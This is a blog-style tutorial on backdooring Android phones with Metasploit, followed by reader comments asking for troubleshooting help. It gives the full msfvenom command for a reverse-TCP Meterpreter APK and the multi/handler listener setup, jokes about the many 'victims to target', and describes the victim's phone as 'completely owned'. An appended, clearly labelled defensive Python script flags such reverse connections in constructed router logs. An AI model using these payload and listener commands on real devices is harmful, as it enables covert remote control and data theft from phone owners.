How to Hack Android Smartphone Using Metasploit

Hello friends, how are you? I hope everything is going great 😀 Today we will be talking about hacking an Android smartphone using Metasploit.

Important: All the details shown in this article are for educational purposes only, and we are not responsible for any of your acts.

Why Hack Android Phones?

So the first question that comes to mind after hearing this is: why in the world would we want to hack Android phones? The answer is really simple: the majority of people out there are Android users, so you have a lot of victims to target 😀

But seriously, don’t hack anyone’s device without their permission, or you can get into a lot of trouble for doing Android hacking.

What is Android?

According to Wikipedia:

Android is an operating system based on Linux Kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers.

Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.

What is Metasploit?

Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby.

To put it in simple words, it is an open-source framework: a tool for creating exploits against remote victims, and it also comes with a whole list of readily available exploits.

It is a favorite tool of security researchers and ethical hackers for performing their attacks. It makes it super simple to create different payloads for different operating systems and platforms.

Metasploit for Android Hacking?

What method will we be using to hack the phone? We are going to create a backdoor and install it on the victim’s phone.

What is Backdoor?

A backdoor is a method of bypassing authentication in a product, computer, etc. Backdoors are usually used for unauthorized access to a computer.

For Android, we are going to create an APK file with a backdoor in it. Android Application Package (APK) is the file format used to distribute and install application software onto Google’s Android OS. It is similar to an MSI package on Windows or a Deb package on Linux-based operating systems.

Requirements:

  1. Metasploit Framework (pre-installed in Kali Linux)
  2. Victim’s Android smartphone (unfortunately, that is my phone)

Step By Step Hacking Android Phone Using Metasploit:

So now let’s get into it.

  1. Open a terminal.
  2. We are going to use msfvenom, Metasploit’s payload generator, to create the exploit/backdoor for this tutorial.
  3. Use this command to generate the exploit/backdoor for the victim.

     msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_ip> LPORT=4444 R > hack.apk

Generate Android Payload using msfvenom

Let me explain the above command. We are using msfvenom as the payload generator, with the Android Meterpreter payload making a reverse connection to the attacker’s system. LHOST defines the attacker’s IP address, where he will receive the reverse connection from the victim. Likewise, LPORT is the port the connection will be made on, here 4444. R > hack.apk writes the generated payload out to the file hack.apk.

MSFVenom Payload

Now we are ready for the next step. Because this payload uses reverse_tcp, the attacker listens on the port specified in the payload for a reverse connection from the victim.

So now we need to set up a handler for incoming connections to that port. Let’s do it.

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

Now we will listen for the connections being received on the attacker system.

set lhost 192.168.1.104

set lport 4444

exploit 

Remember that LHOST and LPORT are the attacker’s IP address and the port on which to listen for the reverse connection, and exploit starts the listener.

Now as soon as the victim installs the APK exploit/backdoor, you will get the reverse Meterpreter session on your terminal, like this.

Here we have some information that we have extracted from the Android system, so the victim’s phone has been completely owned.

The successful hack dance  😈  😈

 

So after all this explanation what we have learned is never install apps from unknown sources 😀 or else you are completely screwed :3
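
The reverse connection described above, seen from the defender's side, as an added example that is not part of the original article: it scans constructed router log lines for Wi-Fi clients that open TCP connections to another LAN host on an unlisted service or to the LPORT used here. The subnet, the allowlist entries and the log format are assumptions.

```python
import ipaddress
import re
from collections import Counter

# Constructed iptables-LOG-style lines (sample data, not captured traffic).
SAMPLE_LOG = """\
Jan 10 10:01:02 router kernel: SRC=192.168.1.57 DST=142.250.74.14 PROTO=TCP SPT=40112 DPT=443 SYN
Jan 10 10:01:09 router kernel: SRC=192.168.1.57 DST=192.168.1.104 PROTO=TCP SPT=41822 DPT=4444 SYN
Jan 10 10:01:15 router kernel: SRC=192.168.1.23 DST=192.168.1.1 PROTO=UDP SPT=5353 DPT=53
Jan 10 10:02:40 router kernel: SRC=192.168.1.57 DST=192.168.1.104 PROTO=TCP SPT=41830 DPT=4444 SYN
Jan 10 10:03:00 router kernel: SRC=192.168.1.23 DST=192.168.1.10 PROTO=TCP SPT=50222 DPT=631 SYN
"""

LAN = ipaddress.ip_network("192.168.1.0/24")  # assumed lab subnet (matches LHOST above)
ALLOWED = {("192.168.1.1", 53), ("192.168.1.10", 631)}  # hypothetical gateway DNS, printer
WATCH_PORTS = {4444}  # the LPORT used in this walkthrough

LINE_RE = re.compile(
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=(?P<proto>\S+) "
    r"SPT=\d+ DPT=(?P<dpt>\d+)(?P<flags>.*)"
)

def find_suspect_flows(log_text):
    """Return {(src, dst, dport): (syn_count, reasons)} for flagged attempts."""
    counts, reasons = Counter(), {}
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m or m["proto"] != "TCP":
            continue
        flags = m["flags"].split()
        if "SYN" not in flags or "ACK" in flags:
            continue  # keep only new connection attempts, not replies
        src, dst, dpt = m["src"], m["dst"], int(m["dpt"])
        if ipaddress.ip_address(src) not in LAN:
            continue  # only connections opened by LAN clients
        why = set()
        if ipaddress.ip_address(dst) in LAN and (dst, dpt) not in ALLOWED:
            why.add("client-to-client connection to unlisted service")
        if dpt in WATCH_PORTS:
            why.add("destination port on watch list")
        if why:
            counts[(src, dst, dpt)] += 1
            reasons.setdefault((src, dst, dpt), set()).update(why)
    return {k: (counts[k], sorted(reasons[k])) for k in counts}

if __name__ == "__main__":
    for flow, (n, why) in find_suspect_flows(SAMPLE_LOG).items():
        print(flow, n, "; ".join(why))
```

On the sample data only the phone at 192.168.1.57 is reported, with two connection attempts to 192.168.1.104:4444; the HTTPS, DNS and printer traffic passes.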

If you have any questions, comment below and we will try our best to help you out. Do share with your friends.

  • Kitty

    Hey.. I installed the backdoor on my phone but nothing happened. What could be the problem?

    • just check if you have correctly set up the kali machine i on the backdoor and is the mobile on the same network because this tutorial is only for local network

  • Black Jack

    Hi there. I am learning about ethical hacking and love your articles. I am SUPER new to all this and have the Oracle VM with Kali and have followed your tutorial with my own Samsung device to see how it works. When I get to the exploit stage it simply stays on the screen immediately following > exploit. Nothing seems to happen and I am wondering if it is because I haven’t got a USB wireless wifi device? I have followed a few tutorials that say Kali won’t connect to my computer’s wireless card and I need to buy an external USB wireless adapter?? Is this maybe the issue?

  • Solzy

    nice ..!

  • Not Bob Dillon

    Hey mate, I just went through your whole tutorial up until the end part where I put in the exploit command and it came back saying “Handler failed to bind to (my ip address):1234:- –”
    Then “Started reverse TCP handler on 0.0.0.0:1234”. I have no idea what that means, so if you can send a reply with some help, I would much appreciate that. TY dude

  • Not Bob Dillon

    Okay, so I fixed my earlier problem and have a new one, when I use the exploit command it does all the right things but doesn’t give me the option to write any commands and when I do try to type something it says unknown command and goes back to the “msf exploit(handler)” console, I have no idea what to do and would appreciate some help this time. Ty dude